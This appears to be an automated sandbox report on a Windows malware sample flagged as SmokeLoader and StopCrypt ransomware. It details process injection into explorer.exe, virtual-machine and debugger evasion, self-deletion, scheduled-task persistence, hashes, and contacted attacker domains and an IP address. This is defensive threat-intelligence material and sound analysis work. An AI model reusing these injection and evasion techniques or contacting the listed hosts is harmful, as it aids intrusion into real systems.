                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00412B13 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00412B13
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sifdvgfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sifdvgfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\iknc1je7ry.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sifdvgf:Zone.Identifier read attributes | deleteJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 1096Thread sleep count: 626 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3160Thread sleep count: 306 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3160Thread sleep time: -30600s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2104Thread sleep count: 314 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2104Thread sleep time: -31400s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-9033
                Source: C:\Users\user\AppData\Roaming\sifdvgfEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 626Jump to behavior
                Source: C:\Users\user\AppData\Roaming\sifdvgfAPI coverage: 7.5 %
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeSystem information queried: ModuleInformationJump to behavior
                Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: explorer.exe, 0000000B.00000000.389463965.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                Source: explorer.exe, 0000000B.00000000.370908749.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                Source: explorer.exe, 0000000B.00000000.356613170.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                Source: explorer.exe, 0000000B.00000000.370908749.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00406C16
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00412B13 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00412B13
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00416B07 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00416B07
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00520042 push dword ptr fs:[00000030h]0_2_00520042
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040CC65 SetUnhandledExceptionFilter,0_2_0040CC65
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00406C16
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0041069C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_0041069C
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_004077DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004077DB
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0040CC65 SetUnhandledExceptionFilter,12_2_0040CC65
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00406C16
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0041069C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,12_2_0041069C
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_004077DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004077DB

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: sifdvgf.11.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeMemory written: C:\Users\user\Desktop\ikNC1JE7rY.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00520110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00520110
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeThread created: C:\Windows\explorer.exe EIP: 57B1930Jump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeProcess created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe" Jump to behavior
                Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                Source: explorer.exe, 0000000B.00000000.360403019.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.393557040.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.371352363.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000B.00000000.354757916.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.380521521.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.329989125.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: GetLocaleInfoA,0_2_004170E0
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: GetLocaleInfoA,12_2_004170E0
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040D835 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040D835
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00405A6B __EH_prolog,GlobalAlloc,VirtualProtect,GetLastError,GetProcessHandleCount,GetSystemDefaultLCID,GetVersionExW,GetComputerNameA,GlobalWire,ResetEvent,OpenWaitableTimerA,FindNextFileW,__wfopen_s,_feof,_puts,OleQueryCreateFromData,WinHttpCloseHandle,FoldStringW,_feof,_fsetpos,_fprintf,GetLongPathNameA,CreateMutexA,SetConsoleCtrlHandler,AddAtomW,lstrcpynA,SetFileShortNameW,GetFileType,FindFirstChangeNotificationW,GetConsoleAliasW,GetUserDefaultLangID,LoadLibraryA,0_2_00405A6B

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Native API
                1
                DLL Side-Loading
                512
                Process Injection
                11
                Masquerading
                1
                Input Capture
                1
                System Time Discovery
                Remote Services1
                Input Capture
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                12
                Virtualization/Sandbox Evasion
                LSASS Memory331
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth2
                Non-Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                Process Injection
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
                Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Deobfuscate/Decode Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials15
                System Information Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Software Packing
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                File Deletion
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 713054 Sample: ikNC1JE7rY.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected SmokeLoader 2->40 42 Machine Learning detection for sample 2->42 7 ikNC1JE7rY.exe 2->7         started        10 sifdvgf 2->10         started        process3 signatures4 44 Contains functionality to inject code into remote processes 7->44 46 Injects a PE file into a foreign processes 7->46 12 ikNC1JE7rY.exe 7->12         started        48 Multi AV Scanner detection for dropped file 10->48 50 Machine Learning detection for dropped file 10->50 process5 signatures6 52 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Checks if the current machine is a virtual machine (disk enumeration) 12->56 58 Creates a thread in another existing process (thread injection) 12->58 15 explorer.exe 2 12->15 injected process7 dnsIp8 24 host-file-host6.com 176.124.192.17, 49704, 80 GULFSTREAMUA Russian Federation 15->24 26 host-host-file8.com 15->26 20 C:\Users\user\AppData\Roaming\sifdvgf, PE32 15->20 dropped 22 C:\Users\user\...\sifdvgf:Zone.Identifier, ASCII 15->22 dropped 28 System process connects to network (likely due to code injection or exploit) 15->28 30 Benign windows process drops PE files 15->30 32 Deletes itself after installation 15->32 34 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->34 file9 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                ikNC1JE7rY.exe72%ReversingLabsWin32.Ransomware.StopCrypt
                ikNC1JE7rY.exe39%VirustotalBrowse
                ikNC1JE7rY.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\sifdvgf100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\sifdvgf72%ReversingLabsWin32.Ransomware.StopCrypt
                SourceDetectionScannerLabelLinkDownload
                0.2.ikNC1JE7rY.exe.5215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                12.2.sifdvgf.4515a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                10.2.ikNC1JE7rY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.ikNC1JE7rY.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://host-file-host6.com/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                host-file-host6.com
                176.124.192.17
                truetrue
                  unknown
                  host-host-file8.com
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://host-file-host6.com/false
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.342540807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.372565994.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      176.124.192.17
                      host-file-host6.comRussian Federation
                      59652GULFSTREAMUAtrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:713054
                      Start date and time:2022-09-29 23:12:52 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 50s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:ikNC1JE7rY.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@4/2@4/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 94% (good quality ratio 87%)
                      • Quality average: 75.8%
                      • Quality standard deviation: 30.7%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 14
                      • Number of non-executed functions: 39
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      TimeTypeDescription
                      23:15:11Task SchedulerRun new task: Firefox Default Browser Agent DDAFBAE16BF5DA6D path: C:\Users\user\AppData\Roaming\sifdvgf
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      176.124.192.17o9dcXf4kd3.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      gRkuF8ZsVN.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      host-file-host6.como9dcXf4kd3.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      gRkuF8ZsVN.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      GULFSTREAMUAXQf2T4w6HU.exeGet hashmaliciousBrowse
                      • 176.124.211.205
                      o9dcXf4kd3.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      gRkuF8ZsVN.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      No context
                      No context
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):297472
                      Entropy (8bit):6.8318712843963985
                      Encrypted:false
                      SSDEEP:6144:ojycY4PGQvQbgTBVpv3kbByoSg0RwwVfg:oVGgRTXpf+BTStRk
                      MD5:44F5530502DB25E5E66C15260EC4D25C
                      SHA1:EDE93F48F848E0B70C6B883087923EA83F74E9D8
                      SHA-256:4B952AC0A783E889A32E9528591E64EB51D41095B251C23C9763B3C8DB973690
                      SHA-512:A50E57BB3A54F491F303D928C5B4224DFE6AB89D63589B0F1A77CDCDA808CAD35703483FE9420D2074BA4E0A780193A38B7AE23C8F9EE5DAD451805C35027DC3
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 72%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K^_.*0..*0..*0..x...*0..x..)*0...K..*0..*1.,*0..x...*0..x...*0..x...*0.Rich.*0.........................PE..L...x.2a.................z...4......9w............@.................................9p.......................................~..P..................................0................................R..@............................................text....y.......z.................. ..`.data....r.......L...~..............@....rsrc..............................@..@.reloc..n............l..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.8318712843963985
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.55%
                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:ikNC1JE7rY.exe
                      File size:297472
                      MD5:44f5530502db25e5e66c15260ec4d25c
                      SHA1:ede93f48f848e0b70c6b883087923ea83f74e9d8
                      SHA256:4b952ac0a783e889a32e9528591e64eb51d41095b251c23c9763b3c8db973690
